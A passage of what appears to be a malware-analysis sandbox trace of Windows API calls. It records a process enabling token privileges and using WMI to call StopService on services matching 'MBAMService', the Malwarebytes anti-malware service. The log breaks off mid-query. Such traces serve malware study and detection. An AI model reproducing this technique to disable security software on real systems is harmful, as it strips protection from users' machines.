(_Block=0x322ab70) [0306.856] malloc (_Size=0xc) returned 0x322ab70 [0306.856] IWbemServices:GetObject (in: This=0x2f1a8d8, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x2ecdacc*=0x0, ppCallResult=0x0 | out: ppObject=0x2ecdacc*=0x2f70288, ppCallResult=0x0) returned 0x0 [0306.910] free (_Block=0x322ab70) [0306.911] IWbemClassObject:BeginMethodEnumeration (This=0x2f70288, lEnumFlags=0) returned 0x0 [0306.911] IWbemClassObject:NextMethod (in: This=0x2f70288, lFlags=0, pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0 | out: pstrName=0x2ecdad8*="StartService", ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x2f70480) returned 0x0 [0306.911] lstrlenW (lpString="StartService") returned 12 [0306.911] lstrlenW (lpString="stopservice") returned 11 [0306.911] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0306.911] IUnknown:Release (This=0x2f70480) returned 0x0 [0306.911] IWbemClassObject:NextMethod (in: This=0x2f70288, lFlags=0, pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0 | out: pstrName=0x2ecdad8*="StopService", ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x2f70480) returned 0x0 [0306.911] lstrlenW (lpString="StopService") returned 11 [0306.911] lstrlenW (lpString="stopservice") returned 11 [0306.911] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0306.911] malloc (_Size=0x38) returned 0x322b9d8 [0306.911] ??0CHString@@QAE@XZ () returned 0x2ecd61c [0306.911] GetCurrentThreadId () returned 0x3e0 [0306.911] IWbemClassObject:GetNames (in: This=0x2f70480, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x2ecd62c | out: pNames=0x2ecd62c*="\x01ƀ\x04") returned 0x0 [0306.912] SafeArrayGetLBound (in: psa=0x2f70748, nDim=0x1, plLbound=0x2ecd618 | out: plLbound=0x2ecd618) returned 0x0 [0306.912] SafeArrayGetUBound (in: psa=0x2f70748, nDim=0x1, plUbound=0x2ecd614 | out: plUbound=0x2ecd614) returned 0x0 [0306.912] SafeArrayGetElement (in: psa=0x2f70748, rgIndices=0x2ecd620, pv=0x2ecd630 | out: pv=0x2ecd630) returned 0x0 [0306.912] malloc (_Size=0x24) returned 0x322ba18 [0306.912] IWbemClassObject:GetPropertyQualifierSet (in: This=0x2f70480, wszProperty="ReturnValue", ppQualSet=0x2ecd540 | out: ppQualSet=0x2ecd540*=0x2f1ade8) returned 0x0 [0306.912] malloc (_Size=0xc) returned 0x322ab70 [0306.912] IWbemQualifierSet:Get (in: This=0x2f1ade8, wszName="CIMTYPE", lFlags=0, pVal=0x2ecd510*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2ecd510*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0306.913] free (_Block=0x322ab70) [0306.913] malloc (_Size=0xc) returned 0x322ab70 [0306.913] IWbemClassObject:Get (in: This=0x2f70480, wszName="ReturnValue", lFlags=0, pVal=0x2ecd4e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ecd524*=49075468, plFlavor=0x0 | out: pVal=0x2ecd4e8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ecd524*=19, plFlavor=0x0) returned 0x0 [0306.913] malloc (_Size=0xc) returned 0x322ae58 [0306.913] IWbemQualifierSet:Get (in: This=0x2f1ade8, wszName="read", lFlags=0, pVal=0x2ecd528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2ecd528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0306.913] free (_Block=0x322ae58) [0306.913] malloc (_Size=0xc) returned 0x322ae58 [0306.913] IWbemQualifierSet:Get (in: This=0x2f1ade8, wszName="write", lFlags=0, pVal=0x2ecd528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2ecd528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0306.913] free (_Block=0x322ae58) [0306.913] malloc (_Size=0xc) returned 0x322aea0 [0306.913] malloc (_Size=0xc) returned 0x322ae88 [0306.913] IWbemQualifierSet:Get (in: This=0x2f1ade8, wszName="Description", lFlags=0, pVal=0x2ecd500*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2ecd500*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0306.913] free (_Block=0x322ae88) [0306.913] malloc (_Size=0xc) returned 0x322ae70 [0306.913] lstrlenA (lpString="Not Available") returned 13 [0306.913] malloc (_Size=0x1c) returned 0x322ba48 [0306.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x322ba48, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0306.913] free (_Block=0x322ba48) [0306.914] IUnknown:Release (This=0x2f1ade8) returned 0x0 [0306.914] malloc (_Size=0x24) returned 0x322ba48 [0306.914] malloc (_Size=0xc) returned 0x322ae58 [0306.914] malloc (_Size=0x24) returned 0x322ba78 [0306.914] malloc (_Size=0x38) returned 0x322baa8 [0306.914] malloc (_Size=0x24) returned 0x322bae8 [0306.914] free (_Block=0x322ba78) [0306.914] free (_Block=0x322ba48) [0306.914] free (_Block=0x322ba18) [0306.914] free (_Block=0x322aea0) [0306.914] free (_Block=0x322ae70) [0306.914] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0306.914] IWbemClassObject:GetMethodQualifierSet (in: This=0x2f70288, wszMethod="StopService", ppQualSet=0x2ecda34 | out: ppQualSet=0x2ecda34*=0x2f43e10) returned 0x0 [0306.914] malloc (_Size=0xc) returned 0x322aeb8 [0306.914] IWbemQualifierSet:Get (in: This=0x2f43e10, wszName="Implemented", lFlags=0, pVal=0x2ecda1c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2ecda1c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0306.914] free (_Block=0x322aeb8) [0306.914] malloc (_Size=0xc) returned 0x322aed0 [0306.914] malloc (_Size=0xc) returned 0x322ae10 [0306.914] IWbemQualifierSet:Get (in: This=0x2f43e10, wszName="Description", lFlags=0, pVal=0x2ecda0c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2ecda0c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0306.915] free (_Block=0x322ae10) [0306.915] malloc (_Size=0xc) returned 0x322ae10 [0306.915] IUnknown:Release (This=0x2f43e10) returned 0x0 [0306.915] malloc (_Size=0x38) returned 0x322ba18 [0306.915] malloc (_Size=0x38) returned 0x322ba58 [0306.915] malloc (_Size=0x24) returned 0x322bb18 [0306.915] malloc (_Size=0xc) returned 0x322ae88 [0306.915] malloc (_Size=0x38) returned 0x322bb48 [0306.915] malloc (_Size=0x38) returned 0x322bb88 [0306.915] malloc (_Size=0x24) returned 0x322bbc8 [0306.915] malloc (_Size=0x28) returned 0x322bbf8 [0306.915] malloc (_Size=0x38) returned 0x322bc28 [0306.915] malloc (_Size=0x38) returned 0x322bc68 [0306.915] malloc (_Size=0x24) returned 0x322bca8 [0306.916] free (_Block=0x322bbc8) [0306.916] free (_Block=0x322bb88) [0306.916] free (_Block=0x322bb48) [0306.916] free (_Block=0x322bb18) [0306.916] free (_Block=0x322ba58) [0306.916] free (_Block=0x322ba18) [0306.916] IUnknown:Release (This=0x2f70480) returned 0x0 [0306.916] free (_Block=0x322bae8) [0306.916] free (_Block=0x322baa8) [0306.916] free (_Block=0x322b9d8) [0306.916] IWbemClassObject:NextMethod (in: This=0x2f70288, lFlags=0, pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0 | out: pstrName=0x2ecdad8*="PauseService", ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x2f72db0) returned 0x0 [0306.916] lstrlenW (lpString="PauseService") returned 12 [0306.916] lstrlenW (lpString="stopservice") returned 11 [0306.916] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0306.916] IUnknown:Release (This=0x2f72db0) returned 0x0 [0306.916] IWbemClassObject:NextMethod (in: This=0x2f70288, lFlags=0, pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0 | out: pstrName=0x2ecdad8*="ResumeService", ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x2f72db0) returned 0x0 [0306.916] lstrlenW (lpString="ResumeService") returned 13 [0306.916] lstrlenW (lpString="stopservice") returned 11 [0306.916] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0306.916] IUnknown:Release (This=0x2f72db0) returned 0x0 [0306.916] IWbemClassObject:NextMethod (in: This=0x2f70288, lFlags=0, pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0 | out: pstrName=0x2ecdad8*="InterrogateService", ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x2f72db0) returned 0x0 [0306.916] lstrlenW (lpString="InterrogateService") returned 18 [0306.916] lstrlenW (lpString="stopservice") returned 11 [0306.916] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0306.917] IUnknown:Release (This=0x2f72db0) returned 0x0 [0306.917] IWbemClassObject:NextMethod (in: This=0x2f70288, lFlags=0, pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0 | out: pstrName=0x2ecdad8*="UserControlService", ppInSignature=0x2ecdad4*=0x2f70480, ppOutSignature=0x2ecdad0*=0x2f72fc0) returned 0x0 [0306.917] lstrlenW (lpString="UserControlService") returned 18 [0306.917] lstrlenW (lpString="stopservice") returned 11 [0306.917] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0306.917] IUnknown:Release (This=0x2f70480) returned 0x0 [0306.917] IUnknown:Release (This=0x2f72fc0) returned 0x0 [0306.917] IWbemClassObject:NextMethod (in: This=0x2f70288, lFlags=0, pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0 | out: pstrName=0x2ecdad8*="Create", ppInSignature=0x2ecdad4*=0x2f70480, ppOutSignature=0x2ecdad0*=0x2f74f08) returned 0x0 [0306.917] lstrlenW (lpString="Create") returned 6 [0306.917] lstrlenW (lpString="stopservice") returned 11 [0306.917] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0306.918] IUnknown:Release (This=0x2f70480) returned 0x0 [0306.918] IUnknown:Release (This=0x2f74f08) returned 0x0 [0306.918] IWbemClassObject:NextMethod (in: This=0x2f70288, lFlags=0, pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0 | out: pstrName=0x2ecdad8*="Change", ppInSignature=0x2ecdad4*=0x2f70480, ppOutSignature=0x2ecdad0*=0x2f74c88) returned 0x0 [0306.918] lstrlenW (lpString="Change") returned 6 [0306.918] lstrlenW (lpString="stopservice") returned 11 [0306.918] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0306.918] IUnknown:Release (This=0x2f70480) returned 0x0 [0306.918] IUnknown:Release (This=0x2f74c88) returned 0x0 [0306.918] IWbemClassObject:NextMethod (in: This=0x2f70288, lFlags=0, pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0 | out: pstrName=0x2ecdad8*="ChangeStartMode", ppInSignature=0x2ecdad4*=0x2f70480, ppOutSignature=0x2ecdad0*=0x2f730a8) returned 0x0 [0306.918] lstrlenW (lpString="ChangeStartMode") returned 15 [0306.918] lstrlenW (lpString="stopservice") returned 11 [0306.918] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0306.918] IUnknown:Release (This=0x2f70480) returned 0x0 [0306.918] IUnknown:Release (This=0x2f730a8) returned 0x0 [0306.918] IWbemClassObject:NextMethod (in: This=0x2f70288, lFlags=0, pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0 | out: pstrName=0x2ecdad8*="Delete", ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x2f462b8) returned 0x0 [0306.918] lstrlenW (lpString="Delete") returned 6 [0306.918] lstrlenW (lpString="stopservice") returned 11 [0306.918] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0306.918] IUnknown:Release (This=0x2f462b8) returned 0x0 [0306.918] IWbemClassObject:NextMethod (in: This=0x2f70288, lFlags=0, pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0 | out: pstrName=0x2ecdad8*="GetSecurityDescriptor", ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x2f70480) returned 0x0 [0306.918] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0306.919] lstrlenW (lpString="stopservice") returned 11 [0306.919] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0306.919] IUnknown:Release (This=0x2f70480) returned 0x0 [0306.919] IWbemClassObject:NextMethod (in: This=0x2f70288, lFlags=0, pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0 | out: pstrName=0x2ecdad8*="SetSecurityDescriptor", ppInSignature=0x2ecdad4*=0x2f70480, ppOutSignature=0x2ecdad0*=0x2f72f38) returned 0x0 [0306.919] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0306.919] lstrlenW (lpString="stopservice") returned 11 [0306.919] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0306.919] IUnknown:Release (This=0x2f70480) returned 0x0 [0306.919] IUnknown:Release (This=0x2f72f38) returned 0x0 [0306.919] IWbemClassObject:NextMethod (in: This=0x2f70288, lFlags=0, pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0 | out: pstrName=0x2ecdad8*=0x0, ppInSignature=0x2ecdad4*=0x0, ppOutSignature=0x2ecdad0*=0x0) returned 0x40005 [0306.919] IUnknown:Release (This=0x2f70288) returned 0x0 [0306.919] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0306.919] lstrlenW (lpString="SET") returned 3 [0306.919] lstrlenW (lpString="call") returned 4 [0306.919] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0306.919] lstrlenW (lpString="CREATE") returned 6 [0306.919] lstrlenW (lpString="call") returned 4 [0306.919] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0306.919] free (_Block=0x3222b20) [0306.919] malloc (_Size=0x4) returned 0x3222ee8 [0306.919] lstrlenW (lpString="GET") returned 3 [0306.919] lstrlenW (lpString="call") returned 4 [0306.919] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0306.919] lstrlenW (lpString="LIST") returned 4 [0306.919] lstrlenW (lpString="call") returned 4 [0306.919] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0306.919] lstrlenW (lpString="ASSOC") returned 5 [0306.920] lstrlenW (lpString="call") returned 4 [0306.920] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0306.920] WbemLocator:IUnknown:AddRef (This=0x2f14ba8) returned 0x3 [0306.920] free (_Block=0x3222788) [0306.920] lstrlenW (lpString="") returned 0 [0306.920] lstrlenW (lpString="NQDPDE") returned 6 [0306.920] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0306.920] lstrlenW (lpString="NQDPDE") returned 6 [0306.920] malloc (_Size=0xe) returned 0x322ae28 [0306.920] lstrlenW (lpString="NQDPDE") returned 6 [0306.920] GetCurrentThreadId () returned 0x3e0 [0306.920] GetCurrentProcess () returned 0xffffffff [0306.920] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x2ecfbb0 | out: TokenHandle=0x2ecfbb0*=0x2f8) returned 1 [0306.920] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2ecfbac | out: TokenInformation=0x0, ReturnLength=0x2ecfbac) returned 0 [0306.920] malloc (_Size=0x118) returned 0x322b9d8 [0306.920] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x322b9d8, TokenInformationLength=0x118, ReturnLength=0x2ecfbac | out: TokenInformation=0x322b9d8, ReturnLength=0x2ecfbac) returned 1 [0306.920] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x322b9d8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0306.920] free (_Block=0x322b9d8) [0306.920] CloseHandle (hObject=0x2f8) returned 1 [0306.921] lstrlenW (lpString="GET") returned 3 [0306.921] lstrlenW (lpString="call") returned 4 [0306.921] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0306.921] lstrlenW (lpString="LIST") returned 4 [0306.921] lstrlenW (lpString="call") returned 4 [0306.921] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0306.921] lstrlenW (lpString="SET") returned 3 [0306.921] lstrlenW (lpString="call") returned 4 [0306.921] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0306.921] lstrlenW (lpString="CALL") returned 4 [0306.921] lstrlenW (lpString="call") returned 4 [0306.921] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0306.921] ??0CHString@@QAE@XZ () returned 0x2ecfb70 [0306.921] GetCurrentThreadId () returned 0x3e0 [0306.921] malloc (_Size=0xc) returned 0x322aea0 [0306.921] malloc (_Size=0xc) returned 0x322ae40 [0306.921] malloc (_Size=0xc) returned 0x322ae70 [0306.921] malloc (_Size=0xc) returned 0x322aeb8 [0306.921] malloc (_Size=0xc) returned 0x3229808 [0306.921] SysStringLen (param_1="\\\\") returned 0x2 [0306.921] SysStringLen (param_1="NQDPDE") returned 0x6 [0306.921] malloc (_Size=0xc) returned 0x322bd80 [0306.922] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0306.922] SysStringLen (param_1="\\") returned 0x1 [0306.922] malloc (_Size=0xc) returned 0x322bed0 [0306.922] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0306.922] SysStringLen (param_1="root\\cimv2") returned 0xa [0306.922] free (_Block=0x322bd80) [0306.922] free (_Block=0x3229808) [0306.922] free (_Block=0x322aeb8) [0306.922] free (_Block=0x322ae70) [0306.922] free (_Block=0x322ae40) [0306.922] free (_Block=0x322aea0) [0306.922] malloc (_Size=0xc) returned 0x322be40 [0306.922] malloc (_Size=0xc) returned 0x322bea0 [0306.922] malloc (_Size=0xc) returned 0x322bdb0 [0306.922] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2f14ba8, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x2f70780) returned 0x0 [0306.932] free (_Block=0x322bdb0) [0306.932] free (_Block=0x322bea0) [0306.932] free (_Block=0x322be40) [0306.932] CoSetProxyBlanket (pProxy=0x2f70780, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0306.932] free (_Block=0x322bed0) [0306.932] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0306.932] ??0CHString@@QAE@XZ () returned 0x2ecfb68 [0306.932] GetCurrentThreadId () returned 0x3e0 [0306.932] malloc (_Size=0x38) returned 0x322b9d8 [0306.932] malloc (_Size=0x28) returned 0x322ba18 [0306.932] malloc (_Size=0x28) returned 0x322ba48 [0306.932] malloc (_Size=0x38) returned 0x322ba78 [0306.932] malloc (_Size=0x38) returned 0x322bab8 [0306.932] malloc (_Size=0x24) returned 0x322baf8 [0306.932] malloc (_Size=0xc) returned 0x322ae40 [0306.933] lstrlenA (lpString="") returned 0 [0306.933] malloc (_Size=0x2) returned 0x3222788 [0306.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x3222788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0306.933] free (_Block=0x3222788) [0306.933] malloc (_Size=0x38) returned 0x322bb28 [0306.933] malloc (_Size=0x24) returned 0x322bb68 [0306.933] malloc (_Size=0xc) returned 0x322aea0 [0306.933] free (_Block=0x322ae40) [0306.933] IWbemServices:GetObject (in: This=0x2f70780, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x2ecfb40*=0x0, ppCallResult=0x0 | out: ppObject=0x2ecfb40*=0x2f70288, ppCallResult=0x0) returned 0x0 [0306.984] malloc (_Size=0xc) returned 0x322ae40 [0306.984] IWbemClassObject:GetMethod (in: This=0x2f70288, wszName="stopservice", lFlags=0, ppInSignature=0x2ecfb5c, ppOutSignature=0x2ecfb3c | out: ppInSignature=0x2ecfb5c*=0x0, ppOutSignature=0x2ecfb3c*=0x2f736c0) returned 0x0 [0306.984] free (_Block=0x322ae40) [0306.984] IUnknown:Release (This=0x2f736c0) returned 0x0 [0306.984] IUnknown:Release (This=0x2f70288) returned 0x0 [0306.985] ??0CHString@@QAE@XZ () returned 0x2ecfa20 [0306.985] GetCurrentThreadId () returned 0x3e0 [0306.985] malloc (_Size=0xc) returned 0x322aeb8 [0306.985] lstrlenA (lpString="") returned 0 [0306.985] malloc (_Size=0x2) returned 0x3222788 [0306.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x3222788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0306.985] free (_Block=0x3222788) [0306.985] malloc (_Size=0xc) returned 0x322ae40 [0306.985] lstrlenA (lpString="") returned 0 [0306.985] malloc (_Size=0x2) returned 0x3222788 [0306.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x3222788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0306.985] free (_Block=0x3222788) [0306.985] malloc (_Size=0xc) returned 0x322ae70 [0306.985] free (_Block=0x322ae40) [0306.985] malloc (_Size=0xc) returned 0x322ae40 [0306.985] lstrlenA (lpString="SELECT * FROM ") returned 14 [0306.985] malloc (_Size=0x1e) returned 0x322bb98 [0306.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x322bb98, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0306.985] free (_Block=0x322bb98) [0306.985] malloc (_Size=0xc) returned 0x3229808 [0306.985] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0306.985] SysStringLen (param_1="Win32_Service") returned 0xd [0306.985] free (_Block=0x322ae40) [0306.985] malloc (_Size=0xc) returned 0x322ae40 [0306.985] malloc (_Size=0xc) returned 0x322bf48 [0306.986] lstrlenA (lpString=" WHERE ") returned 7 [0306.986] malloc (_Size=0x10) returned 0x322bde0 [0306.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x322bde0, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0306.986] free (_Block=0x322bde0) [0306.986] malloc (_Size=0xc) returned 0x322bd20 [0306.986] SysStringLen (param_1=" WHERE ") returned 0x7 [0306.986] SysStringLen (param_1="name like '%%MBAMService%%'") returned 0x1b [0306.986] malloc (_Size=0xc) returned 0x322bd50 [0306.986] 